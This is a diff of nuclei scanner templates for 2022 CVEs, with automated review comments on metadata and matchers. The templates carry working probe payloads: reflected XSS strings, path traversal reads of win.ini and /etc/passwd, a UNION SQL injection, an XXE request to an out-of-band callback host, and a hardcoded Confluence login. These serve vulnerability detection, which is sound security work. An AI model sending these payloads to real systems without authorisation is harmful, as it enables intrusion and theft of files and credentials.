+ - '"></script><script>alert(document.domain)</script>' + - '"Not authenticated"' + condition: and + + - type: word + part: header + words: + - text/html +# digest: 4b0a00483046022100dd79aa0474a89a2ac03e8147296d8958bd8863792570ee2d226ce4ef2bb5fe47022100f21bdc20c0df7169bf401f396d4d70048dddd98be918337c91d990bd543060b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
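Review bot: `remediation` lists only the workaround (disable canonical tags) even though the name pins the fix at `<4.13.3`; suggest `Upgrade to Contao 4.13.3 or later; as a workaround, users may disable canonical tags in the root page settings.` The body matcher requires the reflected payload together with `"Not authenticated"` under `condition: and`, so a hit means the reflection happens on the unauthenticated back-end login response; that pairing is not obvious from the advisory and is worth a one-line comment on the `condition: and` line.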
diff --git a/nuclei-templates/CVE-2022/CVE-2022-24990.yaml b/nuclei-templates/CVE-2022/cve-2022-24990.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-24990.yaml rename to nuclei-templates/CVE-2022/cve-2022-24990.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-25216.yaml b/nuclei-templates/CVE-2022/cve-2022-25216.yaml index adef971fa1..e76bdcc221 100644 --- a/nuclei-templates/CVE-2022/cve-2022-25216.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-25216.yaml 
@@ -1,21 +1,34 @@ id: CVE-2022-25216 info: - name: DVDFab 12 Player/PlayerFab - Arbitrary File Read + name: DVDFab 12 Player/PlayerFab - Local File Inclusion author: 0x_Akoko severity: high - description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access + description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access. + impact: | + The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure. + remediation: | + Apply the latest patch or update from the vendor to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2022-07 - - https://www.cvedetails.com/cve/CVE-2022-25216 + - https://nvd.nist.gov/vuln/detail/CVE-2022-25216 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25216 cwe-id: CWE-22 - tags: cve,cve2022,dvdFab,lfi,lfr + epss-score: 0.01345 + epss-percentile: 0.85828 + cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dvdfab + product: 12_player + tags: cve,cve2022,dvdFab,lfi,lfr,tenable,dvdfab -requests: +http: - method: GET path: - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini" @@ -33,3 +46,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402203f6ae7c1e6a044dfb0d2128ba0584e801d970fb9556d08d9a0525a2a896768f502202d00ccb4c7597331865d1c3b386225396ccb8816353db36cda136dc03489c824:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
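Review bot: The new `tags` line carries both `dvdFab` and `dvdfab`, which differ only in case; keep a single lower-case entry so the template filters like its siblings, `tags: cve,cve2022,dvdfab,lfi,lfr,tenable`. The description now says "local file inclusion" while the behaviour it describes (downloading any file with an absolute Windows path) is a path traversal/arbitrary file read, which the original name captured more precisely; if the rename is for taxonomy consistency a short note in the description would avoid confusion. The request and body matchers are outside this hunk.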
diff --git a/nuclei-templates/CVE-2022/cve-2022-25323.yaml b/nuclei-templates/CVE-2022/cve-2022-25323.yaml new file mode 100644 index 0000000000..ebf9e285b9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-25323.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-25323 + +info: + name: ZEROF Web Server 2.0 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. + reference: + - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 + - https://awillix.ru + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/awillix/research + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-25323 + cwe-id: CWE-79 + epss-score: 0.00115 + epss-percentile: 0.45093 + cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zerof + product: web_server + tags: cve,cve2022,xss,zerof + +http: + - method: GET + path: + - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'back<img src=x onerror=alert(document.domain)>' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 401 +# digest: 4a0a00473045022100e86147269d500eee87a76dc8b3d4d6b539f23c5c25293ad044322e223159453702203e3e862ec74768390d0b5445cfb478c43678e1e7109cd2e1d3f97e9bb17fdd90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
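Review bot: The status matcher expects 401, which is unusual for a cross-site scripting check and deserves a comment explaining that the payload is reflected in the server's authentication-challenge response (presumably why the check passes without credentials — confirm against the reference), e.g. `- 401 # payload is reflected in the auth challenge page for /admin.back*`. The description is a single clause; saying where the reflection occurs (the path segment appended after /admin.back) would bring it to the level of detail of the sibling templates in this commit.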
diff --git a/nuclei-templates/CVE-2022/CVE-2022-26134.yaml b/nuclei-templates/CVE-2022/cve-2022-26134.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-26134.yaml rename to nuclei-templates/CVE-2022/cve-2022-26134.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-26135.yaml b/nuclei-templates/CVE-2022/cve-2022-26135.yaml deleted file mode 100644 index 6ec4be4593..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26135.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2022-26135 - -info: - name: Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server - author: dk4trin - severity: high - description: A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4. - reference: - - https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html - - https://github.com/assetnote/jira-mobile-ssrf-exploit - classification: - cvss-score: 7.5 - cve-id: CVE-2020-14179 - tags: cve,cve2022,atlassian,jira,ssrf - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/Signup!default.jspa" - - matchers-condition: and - matchers: - - type: word - words: - - "Email" - - "Username" - - "Password" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-26138.yaml b/nuclei-templates/CVE-2022/cve-2022-26138.yaml index 03523083c2..10f5282faf 100644 --- a/nuclei-templates/CVE-2022/cve-2022-26138.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-26138.yaml 
@@ -6,21 +6,32 @@ info: severity: critical description: | Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance. + remediation: | + Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials. reference: - https://twitter.com/fluepke/status/1549892089181257729 - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html - https://nvd.nist.gov/vuln/detail/CVE-2022-26138 + - https://jira.atlassian.com/browse/CONFSERVER-79483 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26138 cwe-id: CWE-798 + epss-score: 0.97262 + epss-percentile: 0.99834 + cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: atlassian + product: questions_for_confluence shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2022,confluence,atlassian,default-login,kev + tags: cve2022,cve,confluence,atlassian,default-login,kev -requests: +http: - raw: - | POST /dologin.action HTTP/1.1 
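Review bot: The added `cpe` pins `questions_for_confluence:2.7.34` while the description names three affected versions (2.7.34, 2.7.35 and 3.0.2); if the single CPE is meant as a representative entry, a comment on that line saying so would stop readers assuming the check applies to 2.7.34 only. The `tags` reorder to `cve2022,cve` also diverges from the `cve,cve2022` order used by the other templates in this commit and looks accidental. The login request and its matchers continue in the next hunk.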
@@ -29,16 +40,14 @@ requests: os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action - attack: pitchfork payloads: os_username: - disabledsystemuser os_password: - disabled1system1user6708 - + attack: pitchfork matchers: - type: dsl dsl: - 'location == "/httpvoid.action"' - -# Enhanced by md on 2023/01/06 +# digest: 4a0a004730450220422bbf1147e32d7098167fda41b6ebbbab0fb1a33273478a0fe42870a6364d550221009183ec3599722164f7c06a16c6983fbd3faab1b36f05b0913935b8d6339e5f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-26233.yaml b/nuclei-templates/CVE-2022/cve-2022-26233.yaml new file mode 100644 index 0000000000..5ac643025e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26233.yaml 
@@ -0,0 +1,46 @@ +id: CVE-2022-26233 + +info: + name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion + author: 0x_Akoko + severity: high + description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability. + reference: + - https://0day.today/exploit/37579 + - http://seclists.org/fulldisclosure/2022/Apr/0 + - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26233 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-26233 + cwe-id: CWE-22 + epss-score: 0.00654 + epss-percentile: 0.77223 + cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: barco + product: control_room_management_suite + tags: cve,cve2022,barco,lfi,seclists,packetstorm + +http: + - raw: + - |+ + GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and +# digest: 4a0a00473045022100daa8547f82c8615b2d03d8541ff37de1f91c24cf042872c4954ab90b80af5a050220345d77954918025528c4ca7435b98169569b646c348d133e3290273d1c16e42d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-26960.yaml b/nuclei-templates/CVE-2022/cve-2022-26960.yaml new file mode 100644 index 0000000000..e231a5d9bb --- /dev/null 
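Review bot: `unsafe: true` is the load-bearing setting in this template — the description says the request must begin literally with `GET /..\..`, which a normalizing HTTP client would collapse — so it should carry a comment, e.g. `unsafe: true # raw client: the traversal path must reach the server un-normalized (see description)`. The `|+` block scalar keeps the trailing blank line that terminates the request headers, which is easy to "clean up" by mistake; a comment on that line would protect it. With a single matcher there is no `matchers-condition`, which is correct as written.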
+++ b/nuclei-templates/CVE-2022/cve-2022-26960.yaml 
@@ -0,0 +1,50 @@ +id: CVE-2022-26960 + +info: + name: elFinder <=2.1.60 - Local File Inclusion + author: pikpikcu + severity: critical + description: | + elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. + remediation: | + Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability. + reference: + - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html + - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db + - https://www.synacktiv.com/publications.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-26960 + cwe-id: CWE-22 + epss-score: 0.85922 + epss-percentile: 0.98481 + cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: std42 + product: elfinder + tags: cve2022,cve,lfi,elfinder,std42 + +http: + - raw: + - | + GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100b51a2dee0a9598c7c1f521f9373c5bb35728dda0693010a4db82ab044f7124d4022006a5200a4741c2b9c8d1102b86fd448d48abe1e0af4e543f0ea00920ed47e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
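Review bot: The request hard-codes both the install path `/elfinder/php/connector.minimal.php` and the document-root prefix `/var/www/html/elfinder/files/` inside the base64 target, so the check only fires on a default Linux layout and reports other deployments as clean. A comment on the raw request recording that assumption, `# assumes the default /var/www/html/elfinder layout; other web roots will not match`, would make the false-negative surface explicit to operators. The `regex` matcher has no `part`, which defaults to the response body; the sibling cve-2022-29014 template leaves it implicit too, so either spell out `part: body` in both or accept the default consistently.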
diff --git a/nuclei-templates/CVE-2022/cve-2022-27849.yaml b/nuclei-templates/CVE-2022/cve-2022-27849.yaml deleted file mode 100644 index d52f9a2027..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-27849.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-27849 - -info: - name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability - author: random-robbie - severity: high - description: | - WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it. - reference: - - https://wordpress.org/plugins/simple-ajax-chat/#developers - - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability - - https://nvd.nist.gov/vuln/detail/CVE-2022-27849 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-27849 - cwe-id: CWE-200 - metadata: - google-query: inurl:/wp-content/plugins/simple-ajax-chat/ - tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"Chat Log"' - - '"User IP"' - - '"User ID"' - condition: and - - - type: word - part: header - words: - - text/csv - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-28079.yaml b/nuclei-templates/CVE-2022/cve-2022-28079.yaml new file mode 100644 index 0000000000..111b5db77c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28079.yaml 
@@ -0,0 +1,54 @@ +id: CVE-2022-28079 + +info: + name: College Management System 1.0 - SQL Injection + author: ritikchaddha + severity: high + description: | + College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated + - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f + - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 + - https://code-projects.org/college-management-system-in-php-with-source-code/ + - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28079 + cwe-id: CWE-89 + epss-score: 0.80212 + epss-percentile: 0.98029 + cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: college_management_system_project + product: college_management_system + tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project +variables: + num: "999999999" + +http: + - raw: + - | + POST /admin/asign-single-student-subjects.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# + + matchers-condition: and + matchers: + - type: word + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 302 +# digest: 4b0a00483046022100ad3280dd169fc265e15a1fb1734bb88fbfe21000ca36ebab37d25784e71c6416022100a02f6644e9b1a7fd03fc3523742435de169ba87b7c110db223a9010dad57fa2a:922c64590222798bb761d5b6d8e72950 \ No newline 
at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28080.yaml b/nuclei-templates/CVE-2022/cve-2022-28080.yaml index 021d8a2b18..9076309976 100644 --- a/nuclei-templates/CVE-2022/cve-2022-28080.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-28080.yaml @@ -6,18 +6,31 @@ info: severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database. + remediation: | + To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms + cwe-id: CWE-89 + epss-score: 0.01461 + epss-percentile: 0.86424 + cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: event_management_system_project + product: event_management_system + tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project -requests: +http: - raw: - | POST /royal_event/ HTTP/1.1 @@ -38,7 +51,6 @@ requests: ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - | POST /royal_event/btndates_report.php HTTP/1.1 Host: {{Hostname}} @@ -58,7 +70,6 @@ requests: 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true matchers-condition: and matchers: - type: word 
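Review bot: The CVSS vector is `PR:L` and the first reference title says "Authenticated", yet the `tags` line omits `authenticated`, unlike the sibling cve-2022-28080 template in this commit; add it so the check can be filtered consistently: `tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project,authenticated`. The raw request to `/admin/asign-single-student-subjects.php` is sent without any session, so on an instance that redirects unauthenticated users the 302 matcher will pass while the md5 word will not, which is presumably the intended negative outcome; a short comment on the status matcher stating that both must match would confirm it. The hunk's closing line wraps onto this line.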
@@ -68,5 +79,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 +# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28219.yaml b/nuclei-templates/CVE-2022/cve-2022-28219.yaml new file mode 100644 index 0000000000..1d27898b64 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28219.yaml 
@@ -0,0 +1,67 @@ +id: CVE-2022-28219 + +info: + name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an + unauthenticated XML entity injection attack that can lead to remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system. + remediation: | + Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus + is configured with a dedicated service account with restricted privileges. + reference: + - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html + - https://www.horizon3.ai/red-team-blog-cve-2022-28219/ + - https://manageengine.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-28219 + - http://cewolf.sourceforge.net/new/index.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-28219 + cwe-id: CWE-611 + epss-score: 0.97392 + epss-percentile: 0.99909 + cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_adaudit_plus + shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp + +http: + - method: POST + path: + - "{{BaseURL}}/api/agent/tabs/agentData" + + body: | + [ + { + "DomainName": "{{Host}}", + "EventCode": 4688, + "EventType": 0, + "TimeGenerated": 0, + "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! 
foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>" + } + ] + + headers: + Content-Type: application/json + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "ManageEngine" +# digest: 4b0a00483046022100adfe043ed717eb4c2bd34e54d594afa7fcd27ffa6a5abaa6d34ae8fe396dcd53022100ad5db93b3daf8c1043b3d88354716768831713fd53728c5fe7d83373dbdca6b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28363.yaml b/nuclei-templates/CVE-2022/cve-2022-28363.yaml index 163b9040a3..c610bcd0dc 100644 --- a/nuclei-templates/CVE-2022/cve-2022-28363.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-28363.yaml 
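Review bot: The fixed build number is inconsistent: `name` says `<7600` while `description` and `remediation` say 7060, and the vendor advisory in the references should settle which is right; whichever it is, all three fields must agree (for example `name: Zoho ManageEngine ADAudit Plus <7060 - XML Entity Injection/Remote Code Execution` if 7060 is correct). Under `matchers-condition: and` a hit requires the interactsh callback as well as the `ManageEngine` body string, so the body matcher alone never reports; a comment on the `matchers-condition` line noting that the OAST interaction is the primary signal and the body check only guards against unrelated callbacks would help triage. The `"DomainName": "{{Host}}"` field is the only target-derived value in the body and is worth a note saying it is informational, if that is indeed the case.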
@@ -1,31 +1,42 @@ id: CVE-2022-28363 info: - name: Reprise License Manager 14.2 - Reflected Cross-Site Scripting + name: Reprise License Manager 14.2 - Cross-Site Scripting author: Akincibor severity: medium description: | - Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required. + Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-28363 - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-rpvc-qgrm-r54f - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-28363 + - https://github.com/ARPSyndicate/kenzer-templates classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-28363 - tags: cve,cve2022,xss,rlm + cwe-id: CWE-79 + epss-score: 0.00237 + epss-percentile: 0.61062 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: reprisesoftware + product: reprise_license_manager + tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware -requests: +http: - method: GET path: - "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E" matchers-condition: and 
matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -37,3 +48,8 @@ requests: part: header words: - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a0048304602210083399ab30c18aa4ee9e8a8dc77c6a1dc50feb2092036ee0a9fea49eba0c770a4022100aba47004ae87a814261cb712697ce39cb06ac5da29c432abb75c5ec9fac9738c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28365.yaml b/nuclei-templates/CVE-2022/cve-2022-28365.yaml index 051032c3f3..36bde738a1 100644 --- a/nuclei-templates/CVE-2022/cve-2022-28365.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-28365.yaml 
@@ -6,29 +6,37 @@ info: severity: medium description: | Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager. reference: - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-4g2v-6x25-vr7p - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 + - https://www.reprisesoftware.com/RELEASE_NOTES classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-28365 - cwe-id: CWE-668 - tags: rlm,packetstorm,cve,cve2022,exposure + cwe-id: CWE-425 + epss-score: 0.00689 + epss-percentile: 0.77964 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: reprisesoftware + product: reprise_license_manager + tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware -requests: +http: - method: GET path: - "{{BaseURL}}/goforms/rlminfo" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: 
@@ -36,4 +44,7 @@ requests: - "Platform type" condition: and -# Enhanced by md on 2023/02/03 + - type: status + status: + - 200 +# digest: 4a0a004730450221009238cd94d4ea391e4ba3a8fd9b6b9e4d2b1b35ea6b4618985cbd7679ba6c26aa022046b75d3e44aef88da8a1c3a43d4d2f499141f72031f265049c0993976f2531de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29014.yaml b/nuclei-templates/CVE-2022/cve-2022-29014.yaml new file mode 100644 index 0000000000..6fd1794a52 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29014.yaml 
